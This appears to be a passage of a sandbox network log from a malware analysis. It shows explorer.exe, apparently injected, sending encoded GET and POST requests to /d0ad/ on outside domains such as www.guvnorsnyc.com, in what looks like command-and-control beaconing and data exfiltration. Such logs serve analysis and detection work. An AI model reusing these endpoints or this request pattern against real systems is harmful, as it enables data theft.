Oct 26, 2022 13:20:39.713937044 CEST	2037	OUT	Data Raw: 4f 65 44 6e 53 58 5f 59 41 63 64 45 61 4e 65 44 78 6c 74 35 52 50 49 6d 6c 76 70 6a 5a 4e 79 49 41 76 49 70 62 59 73 75 6a 63 75 65 66 49 4b 48 2d 4f 4f 65 59 4d 6f 32 39 64 65 4b 79 7e 69 4e 54 67 37 51 4a 65 72 78 4f 4d 71 68 77 50 4b 42 69 34 Data Ascii: OeDnSX_YAcdEaNeDxlt5RPImlvpjZNyIAvIpbYsujcuefIKH-OOeYMo29deKy~iNTg7QJerxOMqhwPKBi402G(UvlHvCZtYfhXE~ZmGfjs3XAxMCYhoaf49MgLcP_(Wwom97QAT0Jy7liXQ8KTzdVnkqqXgYhPSSX3bO89rlJHY5f3eViHTOnrFH6WUxdXOXY0BLKRydHFBvsqzWubmtmhek2VZ9YoH~l9fKTvuv36nTXsO96Qb
Oct 26, 2022 13:20:39.714338064 CEST	2040	OUT	Data Raw: 4a 56 51 68 41 6f 64 30 39 45 33 4a 6b 6c 76 36 44 74 6d 57 6d 6c 53 61 5f 39 38 6c 43 73 46 7e 78 4b 6d 4f 45 71 44 68 54 78 61 4a 41 50 59 6f 45 58 33 43 52 58 58 6f 49 54 69 4f 53 75 71 6f 30 43 65 57 55 53 58 68 6e 78 65 7a 31 33 5a 6b 4c 62 Data Ascii: JVQhAod09E3Jklv6DtmWmlSa_98lCsF~xKmOEqDhTxaJAPYoEX3CRXXoITiOSuqo0CeWUSXhnxez13ZkLbIJ1UJg24dIoim8nkiixQKUC2VtmdZ~FA07W9VCm0s6f2H7TIUorzJnlzesTAYeUTDzjmjuSCS0sfbbzePBGm-tB2g0bo77Pde~I1BN6BTXvyfZRx9QSHxJT1YPsv-3WhpivGBNmkh6lqLYWMPbUWI9h3m3CcxUcr1

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
94	192.168.11.20	49939	89.31.143.1	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:20:41.721947908 CEST	2041	OUT	GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=sqJyaOVlBjEZAVpKslMv4znBhJqv2M2fNLntWooOtuBpve/S7gqmy/xe6Ibp48h7Rh2wKtnd+VCpDIBxA7ILq3XVPp4nW+NhJA== HTTP/1.1 Host: www.altruista.one Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:20:41.736192942 CEST	2041	IN	HTTP/1.1 200 OK Date: Wed, 26 Oct 2022 11:20:41 GMT Content-Type: text/html Content-Length: 6637 Last-Modified: Thu, 21 Jan 2021 10:26:32 GMT Connection: close ETag: "600956d8-19ed" Server: UD Forwarding 3.1 Accept-Ranges: bytes
Oct 26, 2022 13:20:41.736326933 CEST	2043	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 44 6f 6d 61 69 6e 20 72 65 67 69 Data Ascii: <!DOCTYPE html><html lang="de"><head><meta name="description" content="Domain registriert bei united-domains.de"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Domain im Kundenauftrag registriert</title><style>body,h
Oct 26, 2022 13:20:41.736398935 CEST	2044	IN	Data Raw: 70 45 41 50 59 61 64 38 47 41 36 41 41 41 41 41 58 52 53 54 6c 4d 41 51 4f 62 59 5a 67 41 41 42 38 70 4a 52 45 46 55 65 4e 72 74 6d 6f 75 53 6f 79 6f 51 51 42 73 78 43 42 68 41 35 50 48 2f 6e 33 70 74 6e 6f 62 64 5a 4a 78 39 31 63 79 74 6e 4b 70 Data Ascii: pEAPYad8GA6AAAAAXRSTlMAQObYZgAAB8pJREFUeNrtmouSoyoQQBsxCBhA5PH/n3ptnobdZJx91cytnKpJCELTHkHJbuDN94WwVSFihjefhggXYwwhRHyzHN58BqJCDEbNal1nE5Eg4M1lePB2JcSGeMK/V/JVjCU438SqQjzznoSXIH6FyqScESIWgoE3F/wJqMxhSm/MWhRo4tvgx1gBHUZayfuofFzh/wpTDP4Eyjzb1oCP
Oct 26, 2022 13:20:41.736453056 CEST	2045	IN	Data Raw: 37 63 35 2b 38 34 7a 32 77 33 36 44 37 57 50 79 31 51 48 2b 36 4b 4f 79 53 51 47 51 32 46 7a 65 43 4e 61 50 36 2b 48 54 58 42 4d 62 7a 58 64 78 41 51 51 43 38 66 67 72 50 5a 6c 78 51 33 73 61 52 41 4d 2b 66 77 75 64 72 56 73 71 52 76 42 5a 34 7a Data Ascii: 7c5+84z2w36D7WPy1QH+6KOySQGQ2FzeCNaP6+HTXBMbzXdxAQQC8fgrPZlxQ3saRAM+fwudrVsqRvBZ4ztdeEDhNkDAXBfL4gPlQYKjGmaqdg+GMKRMiPOwDWd8HVjwhLr6kXw9VPjIgvO4Dq0lft57Y/KXAni9wFy8IVNGblbE1XBM47venDwXa2IBxPo1X5AeBqxie3aE8RYYV/PybyByG+Uo+EKji5x4idvTxmiEjAR8KZA
Oct 26, 2022 13:20:41.736505032 CEST	2047	IN	Data Raw: 64 30 6e 6b 47 32 58 4f 48 4d 42 77 36 55 5a 69 45 47 77 30 35 65 47 33 72 56 47 61 33 51 42 57 48 42 50 6e 61 78 69 49 52 32 37 4c 2f 68 42 45 69 42 33 66 59 50 6c 71 4c 67 42 4e 6c 39 79 4f 33 77 6c 6b 70 44 55 68 6b 70 63 31 61 6c 4a 2f 6f 7a Data Ascii: d0nkG2XOHMBw6UZiEGw05eG3rVGa3QBWHBPnaxiIR27L/hBEiB3fYPlqLgBNl9yO3wlkpDUhkpc1alJ/ozFWrPUTtj+qDwiSxw0HaaQR6VA7hKghMPMSqf/AOVXTmgqvu9mAAAAAElFTkSuQmCC);overflow:hidden;text-indent:-9999px;font-size:0;color:rgba(255,255,255,0);text-align:left}#log
Oct 26, 2022 13:20:41.736557961 CEST	2048	IN	Data Raw: 6c 6c 74 2e 20 53 69 65 20 77 69 72 64 20 62 65 69 20 6a 65 64 65 72 20 6e 65 75 65 6e 20 44 6f 6d 61 69 6e 20 68 69 6e 74 65 72 6c 65 67 74 20 75 6e 64 20 7a 65 69 67 74 2c 20 64 61 73 73 20 64 69 65 20 6e 65 75 65 20 44 6f 6d 61 69 6e 20 65 72 Data Ascii: llt. Sie wird bei jeder neuen Domain hinterlegt und zeigt, dass die neue Domain erreichbar ist.<br>Ohne diese Platzhalter-Seite würden Besucher eine Fehlermeldung erhalten. Als Kunde von united-domains können Sie diese Domain in Ihre
Oct 26, 2022 13:20:41.736605883 CEST	2048	IN	Data Raw: 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 20 6e 6f 6f 70 65 6e 65 72 22 3e 44 61 74 65 6e 73 63 68 75 74 7a 68 69 6e 77 65 69 73 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 Data Ascii: rel="nofollow noopener">Datenschutzhinweise</a></p></div></div><div class="footer-wrapper"><div class="footer">© united-domains AG. <span> Alle Rechte vorbehalten.</span></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
95	192.168.11.20	49940	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:20:46.764714956 CEST	2049	OUT	POST /d0ad/ HTTP/1.1 Host: www.guvnorsnyc.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.guvnorsnyc.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.guvnorsnyc.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 7e 70 6a 73 4e 30 50 76 33 6e 48 4c 50 58 6c 6b 76 2d 69 36 62 73 31 4a 7a 6d 6c 43 7e 75 33 38 4b 4c 7a 63 34 72 41 2d 28 6e 72 4a 33 78 68 44 57 32 78 36 69 7a 7e 46 53 56 56 6b 4f 6a 6b 72 55 71 4f 62 59 6a 78 39 6b 42 66 4c 44 6c 75 36 56 74 53 36 69 44 57 44 59 62 34 54 72 59 6c 65 46 53 42 53 65 37 57 4f 34 39 43 37 4a 46 4f 58 66 37 4b 36 6a 77 4f 7a 28 71 59 4c 71 61 66 75 39 4b 63 6f 47 4c 61 54 31 41 52 73 69 79 49 5a 42 71 46 68 74 44 66 77 71 6e 54 75 53 7a 6a 58 61 64 51 67 52 50 44 57 56 32 6a 41 46 65 58 58 32 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=~pjsN0Pv3nHLPXlkv-i6bs1JzmlC~u38KLzc4rA-(nrJ3xhDW2x6iz~FSVVkOjkrUqObYjx9kBfLDlu6VtS6iDWDYb4TrYleFSBSe7WO49C7JFOXf7K6jwOz(qYLqafu9KcoGLaT1ARsiyIZBqFhtDfwqnTuSzjXadQgRPDWV2jAFeXX2g).
Oct 26, 2022 13:20:46.776602983 CEST	2050	IN	HTTP/1.1 410 Gone Server: openresty Date: Wed, 26 Oct 2022 11:20:46 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 67 75 76 6e 6f 72 73 6e 79 63 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.guvnorsnyc.com/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
96	192.168.11.20	49941	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:20:48.795923948 CEST	2051	OUT	POST /d0ad/ HTTP/1.1 Host: www.guvnorsnyc.com Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.guvnorsnyc.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.guvnorsnyc.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 7e 70 6a 73 4e 30 50 76 33 6e 48 4c 4e 32 56 6b 74 64 4b 36 50 38 31 47 74 32 6c 43 77 4f 33 34 4b 4b 50 63 34 75 67 75 28 78 37 4a 77 51 39 44 58 30 56 36 6e 7a 7e 46 5a 31 56 68 41 44 6b 61 55 71 7a 6d 59 69 4e 39 6b 48 7a 4c 52 67 36 36 53 64 53 35 74 54 57 41 4f 4c 34 65 68 34 6c 41 46 53 39 77 65 36 53 4f 28 4e 75 37 4b 48 32 58 56 50 65 31 70 77 4f 35 32 4b 59 49 6a 36 66 77 39 4b 59 4f 47 4b 6a 6b 30 78 31 73 73 32 38 5a 54 36 46 75 6e 7a 65 34 79 58 53 75 55 54 4f 4c 44 39 6b 69 49 65 50 6f 52 31 71 59 45 2d 4b 70 31 30 45 6c 54 54 77 45 30 50 67 75 39 4a 7e 4f 67 65 54 34 52 4b 55 78 37 5f 50 31 28 77 48 6e 63 58 69 5f 39 66 31 53 38 69 4c 38 36 4b 76 2d 64 6f 73 67 61 38 6f 77 58 73 49 7a 47 2d 77 34 33 75 6a 69 51 6d 51 6d 70 53 67 64 64 62 48 68 55 6c 77 67 71 35 63 6c 62 42 68 44 63 42 73 58 78 63 6c 41 79 33 59 31 66 79 46 79 56 77 62 2d 73 59 43 75 4c 6c 55 64 63 79 52 35 5a 38 69 50 43 7a 61 6f 5a 79 58 6b 46 45 4d 74 46 62 78 58 7a 77 64 56 68 66 54 51 70 34 4e 32 32 68 32 4a 72 47 41 36 34 53 7e 74 62 37 28 69 75 5f 74 33 38 4d 51 58 35 34 69 35 42 7a 49 4b 57 69 43 67 36 32 39 66 33 63 72 70 58 6a 31 4b 4f 6f 35 4e 50 49 38 65 4b 39 28 79 57 77 33 67 4d 39 59 45 4f 42 62 55 76 4a 56 5f 65 6c 76 54 6b 74 56 41 57 36 55 58 58 77 71 47 35 4c 44 7a 30 6f 7e 4d 66 38 68 4b 53 49 63 32 49 4c 43 4a 70 66 70 6b 77 62 48 45 68 34 47 59 6e 65 7a 7a 48 78 6c 6b 49 56 37 62 57 2d 7e 6b 41 36 4b 6d 5a 4a 76 38 42 38 75 66 6c 4b 6d 79 76 30 58 53 5a 34 6c 6c 51 4d 58 59 67 44 48 76 4b 4a 57 64 33 53 46 56 77 73 36 76 44 39 59 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=~pjsN0Pv3nHLN2VktdK6P81Gt2lCwO34KKPc4ugu(x7JwQ9DX0V6nz~FZ1VhADkaUqzmYiN9kHzLRg66SdS5tTWAOL4eh4lAFS9we6SO(Nu7KH2XVPe1pwO52KYIj6fw9KYOGKjk0x1ss28ZT6Funze4yXSuUTOLD9kiIePoR1qYE-Kp10ElTTwE0Pgu9J~OgeT4RKUx7_P1(wHncXi_9f1S8iL86Kv-dosga8owXsIzG-w43ujiQmQmpSgddbHhUlwgq5clbBhDcBsXxclAy3Y1fyFyVwb-sYCuLlUdcyR5Z8iPCzaoZyXkFEMtFbxXzwdVhfTQp4N22h2JrGA64S~tb7(iu_t38MQX54i5BzIKWiCg629f3crpXj1KOo5NPI8eK9(yWw3gM9YEOBbUvJV_elvTktVAW6UXXwqG5LDz0o~Mf8hKSIc2ILCJpfpkwbHEh4GYnezzHxlkIV7bW-~kA6KmZJv8B8uflKmyv0XSZ4llQMXYgDHvKJWd3SFVws6vD9Y.
Oct 26, 2022 13:20:48.808267117 CEST	2051	IN	HTTP/1.1 410 Gone Server: openresty Date: Wed, 26 Oct 2022 11:20:48 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 67 75 76 6e 6f 72 73 6e 79 63 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.guvnorsnyc.com/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
97	192.168.11.20	49942	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:20:50.826623917 CEST	2054	OUT	POST /d0ad/ HTTP/1.1 Host: www.guvnorsnyc.com Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.guvnorsnyc.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.guvnorsnyc.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 7e 70 6a 73 4e 30 50 76 33 6e 48 4c 4e 32 56 6b 74 64 4b 36 50 38 31 47 74 32 6c 43 77 4f 33 34 4b 4b 50 63 34 75 67 75 28 78 7a 4a 77 69 5a 44 57 55 70 36 6b 7a 7e 46 46 46 56 67 41 44 6b 48 55 75 65 68 59 69 42 48 6b 45 48 4c 52 33 6d 36 54 76 4b 35 6d 44 57 42 51 37 34 51 72 59 6b 44 46 53 42 61 65 2d 36 30 34 39 61 37 4a 42 47 58 66 64 32 36 6c 41 4f 7a 32 4b 59 79 70 71 66 57 39 4b 56 46 47 4b 66 6b 30 7a 42 73 6a 6a 34 5a 41 5a 64 75 71 44 65 35 6f 6e 53 62 64 7a 4f 45 44 39 67 51 49 65 50 34 52 30 75 59 45 38 43 70 32 7a 34 6d 53 7a 77 45 33 50 67 68 71 35 69 30 67 65 4f 39 52 4b 67 78 37 38 50 31 28 51 48 6e 59 32 69 2d 72 50 31 59 33 43 4c 6e 7e 4b 54 4d 64 6f 34 65 61 39 38 77 55 63 63 7a 63 76 77 34 6e 5f 6a 69 54 47 51 6b 6a 79 67 4f 49 72 47 2d 55 6d 59 43 71 34 38 54 62 47 5a 44 66 68 4d 58 68 4e 6c 44 69 48 5a 2d 61 79 46 64 52 31 43 5f 73 59 54 78 4c 6c 56 41 63 7a 6c 35 5a 4d 53 50 44 33 32 72 61 69 58 6a 65 30 4d 43 65 4c 39 4e 7a 77 42 64 68 65 72 41 70 34 35 32 33 42 32 4a 37 78 55 35 32 69 7e 71 48 4c 28 77 6a 66 74 67 38 4d 56 38 35 36 50 4f 42 6a 55 4b 48 42 36 67 74 57 39 63 38 63 71 69 64 44 31 32 4b 6f 35 4e 50 49 77 67 4b 39 37 79 57 67 28 67 65 36 55 45 46 79 7a 55 70 4a 56 6c 65 6c 76 34 6b 74 70 37 57 36 64 45 58 7a 43 73 35 4a 76 7a 31 39 69 4d 50 70 64 4a 5a 59 63 35 4d 4c 44 4a 74 66 6c 4a 77 62 72 4d 68 38 6d 69 6e 75 66 7a 56 6c 42 6b 4d 56 37 61 64 2d 7e 6a 58 4b 4c 76 54 5a 69 74 42 38 79 50 6c 4b 44 76 76 33 6e 53 49 4e 49 4d 55 4d 72 6a 33 78 62 34 4a 73 65 61 70 6a 6c 72 67 75 65 63 56 59 6d 44 7e 70 7e 43 38 63 74 4b 4c 6b 54 54 34 4d 61 70 62 37 4a 45 66 52 4d 67 47 61 68 70 76 4d 41 65 69 45 77 4f 7e 59 65 34 32 2d 49 77 49 66 76 38 6e 6a 76 6d 76 68 55 72 79 45 50 68 56 33 50 73 63 34 28 76 66 79 43 66 57 50 45 45 34 62 57 55 38 35 32 2d 33 55 32 39 4a 52 32 4f 59 79 79 50 52 68 65 5f 4b 63 64 66 6a 56 32 5f 54 38 6b 55 6f 52 79 52 70 57 55 78 4c 79 35 4e 71 67 54 64 69 51 6f 44 44 44 28 78 69 34 48 66 71 32 74 56 78 6c 38 77 53 71 56 48 56 71 31 77 55 65 46 63 55 30 4a 66 5a 45 36 69 4c 42 62 67 37 75 41 69 42 49 47 76 4e 41 58 32 43 42 6d 30 30 4e 36 50 50 63 63 6b 51 6f 55 54 7a 65 6a 6d 6f 68 41 31 70 41 63 74 72 71 77 4c 37 31 30 38 45 52 69 68 44 5f 41 57 6b 42 42 50 67 38 64 52 44 44 69 6b 76 46 43 75 72 32 4e 71 38 36 42 42 44 42 65 75 5a 38 65 32 47 41 28 65 6a 69 58 73 79 4d 6f 76 58 63 6b 34 4a 5a 7e 72 43 71 72 47 6d 44 69 34 75 4b 4a 6d 45 6d 39 44 64 34 58 62 31 44 32 66 47 58 6f 72 56 75 50 68 44 49 4c 42 31 4f 63 5a 32 32 66 33 72 62 44 42 72 68 65 38 75 47 35 56 30 4f 44 79 59 75 74 6c 4f 4c 46 33 35 61 37 6b 4e 57 38 4b 65 4b 4d 44 6c 63 58 75 4b 6d 46 46 77 6e 76 77 68 30 56 43 4a 76 46 4d 6e 6b 75 71 68 4c 71 45 33 35 76 4b 31 52 6d 31 6b 39 70 31 58 4b 4a 4b 41 77 76 51 52 6e 39 67 75 4b 50 4b 6b 30 74 30 74 56 4d 6a 62 67 31 65 52 6a 68 6a 54 52 41 76 6b 7a 39 39 28 63 49 35 6b 31 36 38 39 72 7a 44 45 55 4f 50 6d 70 68 68 6a 67 32 58 41 53 48 77 4b 6e 62 51 43 65 37 76 4e 70 28 66 6d 42 45 5f 54 6a 52 6e 30 6d 67 46 55 70 72 5f 34 32 47 72 74 38 74 6e 7a 4b 36 4d 48 36 74 4b 58 6c 28 6d 38 35 4d 52 73 50 41 46 4a 71 61 36 50 63 41 4a 74 44 4b 5a 46 48 43 53 48 77 58 30 56 74 4f 58 73 6f 54 48 7a 58 36 73 72 36 71 69 53 77 72 59 35 44 28 74 38 55 61 41 7a 38 4a 50 34 6a 51 53 74 31 6d 68 38 50 6f 31 61 54 7a 36 70 4a 54 43 50 51 67 53 74 5a 59 6b 41 73 36 43 51 47 36 48 48 72 78 58 58 78 54 4d 34 5f 63 62 68 59 59 36 36 4a 36 48 58 74 49 64 45 7a 6f 34 6b 42 75 33 75 61 35 46 4d 49 7e 4d 47 71 37 73 75 52 48 52 36 47 7a 51 35 68 59 43 76 6c 4e 6b 48 42 42 66 7a 6b 69 36 77 55 6f 5f 64 57 53 72 69 68 61 33 65 72 33 6e 6e 33 30 72 74 53 71 61 46 6b 4f 6a 78 74 43 42 6e 75 7a 56 36 56 4c 45 33 54 7e 66 68 2d 56 46 50 4a 55 55 76 76 33 4e 66 78 4c 64 6d 78 65 41 43 65 58 71 42 37 72 72 68 55 36 7a 65 57 6a 47 28 71 63 6f 4a 72 7e 48 64 48 63 4b 57 32 46 4d 5a 73 51 31 49 35 47 50 5a 30 77 32 54 4d 32 61 30 5f 6b 77 38 5a 70 32 6f 41 50 4d 41 30 68 42 7a 6b 67 38 42 70 28 36 33 63 6d 33 76 51 77 72 43 53 38 57 66 39 70 47 4a 63 38 73 41 33 64 Data Ascii: jXu=~pjsN0Pv3nHLN2VktdK6P81Gt2lCwO34KKPc4ugu(xzJwiZDWUp6kz~FFFVgADkHUuehYiBHkEHLR3m6TvK5mDWBQ74QrYkDFSBae-6049a7JBGXfd26lAOz2KYypqfW9KVFGKfk0zBsjj4ZAZduqDe5onSbdzOED9gQIeP4R0uYE8Cp2z4mSzwE3Pghq5i0geO9RKgx78P1(QHnY2i-rP1Y3CLn~KTMdo4ea98wUcczcvw4n_jiTGQkjygOIrG-UmYCq48TbGZDfhMXhNlDiHZ-ayFdR1C_sYTxLlVAczl5ZMSPD32raiXje0MCeL9NzwBdherAp4523B2J7xU52i~qHL(wjftg8MV856POBjUKHB6gtW9c8cqidD12Ko5NPIwgK97yWg(ge6UEFyzUpJVlelv4ktp7W6dEXzCs5Jvz19iMPpdJZYc5MLDJtflJwbrMh8minufzVlBkMV7ad-~jXKLvTZitB8yPlKDvv3nSINIMUMrj3xb4JseapjlrguecVYmD~p~C8ctKLkTT4Mapb7JEfRMgGahpvMAeiEwO~Ye42-IwIfv8njvmvhUryEPhV3Psc4(vfyCfWPEE4bWU852-3U29JR2OYyyPRhe_KcdfjV2_T8kUoRyRpWUxLy5NqgTdiQoDDD(xi4Hfq2tVxl8wSqVHVq1wUeFcU0JfZE6iLBbg7uAiBIGvNAX2CBm00N6PPcckQoUTzejmohA1pActrqwL7108ERihD_AWkBBPg8dRDDikvFCur2Nq86BBDBeuZ8e2GA(ejiXsyMovXck4JZ~rCqrGmDi4uKJmEm9Dd4Xb1D2fGXorVuPhDILB1OcZ22f3rbDBrhe8uG5V0ODyYutlOLF35a7kNW8KeKMDlcXuKmFFwnvwh0VCJvFMnkuqhLqE35vK1Rm1k9p1XKJKAwvQRn9guKPKk0t0tVMjbg1eRjhjTRAvkz99(cI5k1689rzDEUOPmphhjg2XASHwKnbQCe7vNp(fmBE_TjRn0mgFUpr_42Grt8tnzK6MH6tKXl(m85MRsPAFJqa6PcAJtDKZFHCSHwX0VtOXsoTHzX6sr6qiSwrY5D(t8UaAz8JP4jQSt1mh8Po1aTz6pJTCPQgStZYkAs6CQG6HHrxXXxTM4_cbhYY66J6HXtIdEzo4kBu3ua5FMI~MGq7suRHR6GzQ5hYCvlNkHBBfzki6wUo_dWSriha3er3nn30rtSqaFkOjxtCBnuzV6VLE3T~fh-VFPJUUvv3NfxLdmxeACeXqB7rrhU6zeWjG(qcoJr~HdHcKW2FMZsQ1I5GPZ0w2TM2a0_kw8Zp2oAPMA0hBzkg8Bp(63cm3vQwrCS8Wf9pGJc8sA3dmGaIiWvAFKgfZZuFrl7Q9WS8Ms_leq7eBtKx1HMlGVIqkNoSWiZvin1KQwWBCDl7-(xp7RdRkfAeyyfEeM8vsyJSPPu~PDDUYlsWh60MB4oGt(Qi774ylHJw6x5SKJrejdCqRcrOVDyPLb5KCz-QNAXeeLOjWo4wiEI2jxLcOh1a-kk82y3Q4LtAecrdCDgpPnjCiX3JTbcYIdpja~LdLN-JEiIoPJzHjR0z-svaHcVKP9QYpk1pLFC(j19uQnPUxU-SU49b7nuVAfUP6QYrfOxqH01KgiYBSzSrx5DLSSG6jzL2DzJRHtv1lKQLIDAHT17rd0WDAQLE1WrbY8u~L0u2UYqamtaQ_6FbLs8b9DqTbSX97pyOLc_MlHWr1yAfk98VBSzFt7GvOqPeEeRTWLCoYeIyPuy468SBa28CpGeLV0jnxsKHCEjDDthqsla5-B9TY8YtYm4E3ItKWYV8yVyenqfDsyV5oBWM4OzjjBXVMhfPkrwFULQ(ixLNx(yFdbhoEAdAiRd0ZjMFHKcoGLXoILjiI5u5NVaOBTg4lW32fonGclvedgR0ZA_NbKyB1fnSSj87vSdiCFsogZ-QrOLi0ep5xrV5uo-fCxKPUceNJ2dQI0VXt9pm2C4wYdqAskQgX045lXoFZw4Ju1qM5gTRq2k(kQWw0yGYI8Io6ISy9sM7Sm4TpWCT8GTjWmAihf4EYT42CAJA-bMzCWLSxzI9XNpDkW36winXIC_v0pLte60wpeJyPDoG0IZNofa7Va9m6RGMj~4YTmRRj4csKV6SQtDM99dFZi45nCbae
Oct 26, 2022 13:20:50.826647997 CEST	2056	OUT	Data Raw: 28 42 36 64 7a 33 56 68 69 4e 4f 6a 53 50 46 62 30 6c 6f 59 28 4b 51 5f 4a 4a 4c 47 7a 45 64 6f 33 35 5a 43 47 4b 7e 6c 54 41 58 38 50 49 6a 45 51 76 34 57 6f 4a 58 48 6c 55 65 44 7e 39 77 53 61 7a 34 6d 4e 47 70 44 4c 75 74 71 7a 70 31 5f 4a 47 Data Ascii: (B6dz3VhiNOjSPFb0loY(KQ_JJLGzEdo35ZCGK~lTAX8PIjEQv4WoJXHlUeD~9wSaz4mNGpDLutqzp1_JGLnweN-xYzwSgeEMwhhep5LLlamocQg16a9DEqVL2Uk6HfrGX5CeUwK6jlqB1nLaJlz9g8vx7CcWGawT2prQC4_9vNlEe(ZoraUYYRJE1ZY1GuJIbPAfjrJW449r80Eu8lbjVhYBxg-KBUZQ82uS6VDy8p10KMjI8J
Oct 26, 2022 13:20:50.826725960 CEST	2064	OUT	Data Raw: 78 79 53 43 56 57 32 76 64 36 70 68 34 53 37 44 46 37 55 66 6d 55 44 44 68 77 45 48 34 4a 54 72 34 6f 46 32 32 44 56 50 73 4c 7e 6f 45 67 30 4f 6e 51 44 48 4b 4b 54 61 6c 6f 6d 31 63 54 69 30 4a 54 61 53 73 38 58 71 4f 42 43 37 79 57 79 6d 44 62 Data Ascii: xySCVW2vd6ph4S7DF7UfmUDDhwEH4JTr4oF22DVPsL~oEg0OnQDHKKTalom1cTi0JTaSs8XqOBC7yWymDbcXyOvwvdWRYXF0nXoXXGt7LK82GeI23QldUqUkidoohogp5nQvMVG4i_syF_D_NveV(e0GbqppVdIFKakpuClJge7tUFOM3NOAupHG~bIEhaBqABPLPwSlBZCdZlqlTB8nR9g_FFUaPJHHBz6XfTAu~WmVOBBkbXw
Oct 26, 2022 13:20:50.837605953 CEST	2067	OUT	Data Raw: 66 74 6e 4b 4a 46 79 4f 55 31 73 69 7a 38 6f 5f 6a 37 6f 2d 33 58 30 62 72 6c 42 56 51 37 6b 34 55 6b 6d 43 76 6c 57 76 6e 63 79 64 32 62 37 6e 71 4f 5a 52 28 62 61 58 67 4d 4e 31 66 56 7a 77 67 39 32 34 4c 36 36 44 59 67 72 76 64 52 74 78 71 54 Data Ascii: ftnKJFyOU1siz8o_j7o-3X0brlBVQ7k4UkmCvlWvncyd2b7nqOZR(baXgMN1fVzwg924L66DYgrvdRtxqT8wW5on(UwTpcSuN6QD1W(ytS14YbW8SyUXBjb8pFhRZSGILb25uk0vzVinTVyaefCOsPvGAp1vblxx0AfdMIUfmPKmDws0FXcH8n(BdJdfdi5Rg9YAxK3GlKGj6n2BG8hZs5clw1qeFP50aEM2vCjzqfj4ZMVLcQS
